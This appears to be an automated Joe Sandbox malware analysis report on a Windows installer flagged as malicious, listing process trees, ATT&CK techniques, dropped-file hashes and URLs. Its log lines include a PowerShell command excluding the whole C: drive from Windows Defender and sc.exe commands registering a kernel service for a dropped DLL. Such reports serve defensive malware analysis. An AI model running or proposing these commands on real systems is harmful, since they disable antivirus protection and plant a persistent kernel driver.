Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar (this identical process creation is recorded 31 times in the report)
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp Code function: 6_2_6CD17700 cpuid 6_2_6CD17700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (recorded 6 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (recorded 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00E9AB2A GetSystemTimeAsFileTime, 10_2_00E9AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00F30090 GetVersion, 10_2_00F30090
MITRE ATT&CK matrix
Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.
Techniques matched by this analysis, grouped by tactic (the digits the matrix shows beside a technique name are the report's signature-count badges, reproduced here in brackets exactly as displayed):
  • Execution: Command and Scripting Interpreter [2], Service Execution [1], Native API [1]
  • Persistence: Windows Service [1], DLL Side-Loading [1]
  • Privilege Escalation: Access Token Manipulation [1], Windows Service [1], Process Injection [111], DLL Side-Loading [1]
  • Defense Evasion: Masquerading [11], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [231], Access Token Manipulation [1], Process Injection [111], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [3], Software Packing [1], DLL Side-Loading [1]
  • Discovery: System Time Discovery [1], Security Software Discovery [321], Virtualization/Sandbox Evasion [231], Process Discovery [2], Application Window Discovery [1], System Owner/User Discovery [2], File and Directory Discovery [3], System Information Discovery [25]
  • Collection: Archive Collected Data [1]
  • Command and Control: Encrypted Channel [1]
  • Impact: System Shutdown/Reboot [1]
No techniques were matched under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement or Exfiltration.
Behavior Graph
Behavior Graph ID: 1579802
Sample: #U5b89#U88c5#U52a9#U624b1.0.2.exe
Start date: 23/12/2024
Architecture: WINDOWS
Score: 80

Top-level signatures:
  • Found driver which could be used to inject code into processes
  • PE file contains section with special chars
  • AI detected suspicious sample
  • Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process tree, with the files dropped and the signatures raised by each node:
  • #U5b89#U88c5#U52a9#U624b1.0.2.exe started
    dropped: C:\...\#U5b89#U88c5#U52a9#U624b1.0.2.tmp (PE32)
    • #U5b89#U88c5#U52a9#U624b1.0.2.tmp started
      dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
      signature: Adds a directory exclusion to Windows Defender
      • #U5b89#U88c5#U52a9#U624b1.0.2.exe started
        dropped: C:\...\#U5b89#U88c5#U52a9#U624b1.0.2.tmp (PE32)
        • #U5b89#U88c5#U52a9#U624b1.0.2.tmp started
          dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Program Files (x86)\...\trash (copy) (PE32+); C:\Program Files (x86)\...\is-EIO1L.tmp (PE32+); 3 other files (1 malicious)
          signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
          • 7zr.exe started
            dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
            • conhost.exe started
          • 7zr.exe started
            • conhost.exe started
      • powershell.exe started
        signature: Loading BitLocker PowerShell Module
        • conhost.exe started
        • WmiPrvSE.exe started
  • cmd.exe started
    • sc.exe started
      • conhost.exe started
  • cmd.exe started
    • sc.exe started
      • conhost.exe started
  • 31 other processes started
    • sc.exe started (three instances shown, each followed by conhost.exe)
    • 27 other processes started (followed by conhost.exe and 26 other processes)

Sample detection (Source, Detection, Scanner):
  • #U5b89#U88c5#U52a9#U624b1.0.2.exe: 0% (ReversingLabs)
Dropped file detection (Source, Detection, Scanner):
  • C:\Program Files (x86)\Windows NT\7zr.exe: 0% (ReversingLabs)
  • C:\Program Files (x86)\Windows NT\hrsw.vbc: 11% (ReversingLabs)
  • C:\Program Files (x86)\Windows NT\is-EIO1L.tmp: 0% (ReversingLabs)
  • C:\Program Files (x86)\Windows NT\tProtect.dll: 9% (ReversingLabs)
  • C:\Program Files (x86)\Windows NT\trash (copy): 0% (ReversingLabs)
  • C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp: 0% (ReversingLabs)
  • C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\_isetup\_setup64.tmp: 0% (ReversingLabs)
  • C:\Users\user\AppData\Local\Temp\is-HSL06.tmp\update.vac: 11% (ReversingLabs)
  • C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp: 0% (ReversingLabs)
  • C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\_isetup\_setup64.tmp: 0% (ReversingLabs)
  • C:\Users\user\AppData\Local\Temp\is-VBCHJ.tmp\update.vac: 11% (ReversingLabs)
No Antivirus matches
No contacted domains info
URLs found in memory and dropped files (Name; Source; Malicious; Antivirus Detection; Reputation):
  • https://aria2.github.io/Usage: (source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr; malicious: false; reputation: high)
  • https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU (source: #U5b89#U88c5#U52a9#U624b1.0.2.exe; malicious: false; reputation: high)
  • https://github.com/aria2/aria2/issuesReport (source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr; malicious: false; reputation: high)
  • http://www.metalinker.org/ (source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr; malicious: false; reputation: high)
  • https://www.remobjects.com/ps (source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126523988.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126982219.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000000.2129128970.0000000000491000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.2150311602.0000000000DAD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr; malicious: false; reputation: high)
  • https://aria2.github.io/ (source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr; malicious: false; reputation: high)
  • https://github.com/aria2/aria2/issues (source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr; malicious: false; reputation: high)
  • https://www.innosetup.com/ (source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126523988.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126982219.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000000.2129128970.0000000000491000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.2150311602.0000000000DAD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr; malicious: false; reputation: high)
  • http://www.metalinker.org/basic_string::_M_construct (source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.dr; malicious: false; reputation: high)
                    No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579802
Start date and time: 2024-12-23 09:23:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b1.0.2.exe (renamed because the original name is a hash value)
Original Sample Name: 1.0.2.exe
Detection: MAL
Classification: mal80.evad.winEXE@135/32@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 76%
  • Number of executed functions: 28
  • Number of non-executed functions: 75
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: #U5b89#U88c5#U52a9#U624b1.0.2.exe
Time, Type, Description:
  • 03:24:09, API Interceptor: 1x Sleep call for process #U5b89#U88c5#U52a9#U624b1.0.2.tmp modified
  • 03:24:12, API Interceptor: 29x Sleep call for process powershell.exe modified
                    No context
Match: C:\Program Files (x86)\Windows NT\7zr.exe
Associated sample names (each detected as malicious, threat name Unknown): #U5b89#U88c5#U52a9#U624b_2.0.8.exe, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Zt43pLXYiu.exe
Process: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
  • Filename: Zt43pLXYiu.exe, Detection: malicious
Process: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999190724188688
Encrypted: true
SSDEEP: 6144:XiH33/Xofh9jGU9Xfxc+fezUh4buMTPKOM+3Hj:XGPonZ5G49MTyoHj
MD5: 07861A39CF1633A3AE529B0AE04C40E1
SHA1: 3B44EFE0BEB2F5CB2F66BBC61DE5B30FDCDE5A47
SHA-256: F693C2A4124E1E7A072F6FA826D86BFCB2C2D46C584F57107B993355919EAD65
SHA-512: 65865B81EA2EBA946416238F93989999B9B07326A3B7A62B72CD7C4498880E4E8C482A5B315F918407A81CCFED4BAEB26F2DAA93B96D97113C7EDBB067FB10C7
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3598848
Entropy (8bit): 7.004949099807939
Encrypted: false
SSDEEP: 49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5: 1D1464C73252978A58AC925ECE57F0FB
SHA1: 30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256: 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512: 40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious: true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 11%
Process: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999190724188688
Encrypted: true
SSDEEP: 6144:XiH33/Xofh9jGU9Xfxc+fezUh4buMTPKOM+3Hj:XGPonZ5G49MTyoHj
MD5: 07861A39CF1633A3AE529B0AE04C40E1
SHA1: 3B44EFE0BEB2F5CB2F66BBC61DE5B30FDCDE5A47
SHA-256: F693C2A4124E1E7A072F6FA826D86BFCB2C2D46C584F57107B993355919EAD65
SHA-512: 65865B81EA2EBA946416238F93989999B9B07326A3B7A62B72CD7C4498880E4E8C482A5B315F918407A81CCFED4BAEB26F2DAA93B96D97113C7EDBB067FB10C7
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
File Type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 5649408
Entropy (8bit): 6.392614480390128
Encrypted: false
SSDEEP: 98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
MD5: 8C71B86BF407C05BAF11E8D296B9C8B8
SHA1: 6624AB8CA883C48F02C58250D4EEE9E90098F4E4
SHA-256: BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
SHA-512: BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
Malicious: true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996401713517506
                                        Encrypted:true
                                        SSDEEP:1536:oGFeM+b/z9Q8Hf+hyC3oOOlOvsVq8iE7V4JDoyaNjHVG+:oG0jb/x3+hyUZGVniVJMtNjHw+
                                        MD5:5C87B157659C2E106E0B4688CAB6B416
                                        SHA1:0CD17EA860DB582A8103011DBAAF6A7C5D67D4A8
                                        SHA-256:3E1EEF1D48BCBB503CBB7F85711E09BF49589681192F57B4A28087AAD03F6D34
                                        SHA-512:4DDA59F57C2E2B5495512C937D6F8647BE5C2FE2D194EBE136CF3F33CD4EEBB49449F1771EF3F663BB3C3A2D1B60E0FD631A3DAD892EF8E7DAEFAE5750712AC3
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996401713517511
                                        Encrypted:true
                                        SSDEEP:1536:+UTRNG5MRWNsq6QcNR0NneqYoKk+1Bab+XUw1lSgWR:+FiafNPYrXBab+Ew1lSgs
                                        MD5:265DFDCCB7A5E843EA2BC63C6BC157DB
                                        SHA1:CE98E0CDB8ADA1BA19E298F5A3B92920A63C96A9
                                        SHA-256:4834855102AA4F56AFC332909712FA54A4FE1EC74D34F97B1EABDACF1D21EF53
                                        SHA-512:0D84C6185097FB3C2035E1721C60EEBDD7FF6435A726AA0B20B57D8C7385883D2A2AF3B12EF6D6FD1B71F82D47EF02CECC7FAD1C1045DE1254F240F9F943E287
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996966859255975
                                        Encrypted:true
                                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996966859255979
                                        Encrypted:true
                                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                        MD5:4CB8B7E557C80FC7B014133AB834A042
                                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):31890
                                        Entropy (8bit):7.99402458740637
                                        Encrypted:true
                                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                        MD5:8622FC7228777F64A47BD6C61478ADD9
                                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):31890
                                        Entropy (8bit):7.99402458740637
                                        Encrypted:true
                                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):74960
                                        Entropy (8bit):7.99759370165655
                                        Encrypted:true
                                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                        MD5:950338D50B95A25F494EE74E97B7B7A9
                                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):74960
                                        Entropy (8bit):7.997593701656546
                                        Encrypted:true
                                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29730
                                        Entropy (8bit):7.994290657653607
                                        Encrypted:true
                                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):29730
                                        Entropy (8bit):7.994290657653608
                                        Encrypted:true
                                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                        Malicious:false
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):249984
                                        Entropy (8bit):7.999190724188687
                                        Encrypted:true
                                        SSDEEP:6144:inOVnV9eG7iJt7TzrZm+vIuLDUlvIuZNpMOlfzTqZaqH:inOVnH2z7FVUlTF7s
                                        MD5:D347FD565397B611DCDA50560B3ECDEF
                                        SHA1:25225A99B860798E8A9241615D3C8FECB57FA2CD
                                        SHA-256:BC10732B9B1A5939245965B7595A9A829B81F9A47B4C6F13EA47CF1DCB4672A6
                                        SHA-512:5A6A6311581BB320722440E47BEE3DDD9E374184AD912D149C932BD81BF377215B3A8D198051A24B26FBA713FDBC998AA76C9A736B73613DB3E55E279D9A02E5
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):63640
                                        Entropy (8bit):6.482810107683822
                                        Encrypted:false
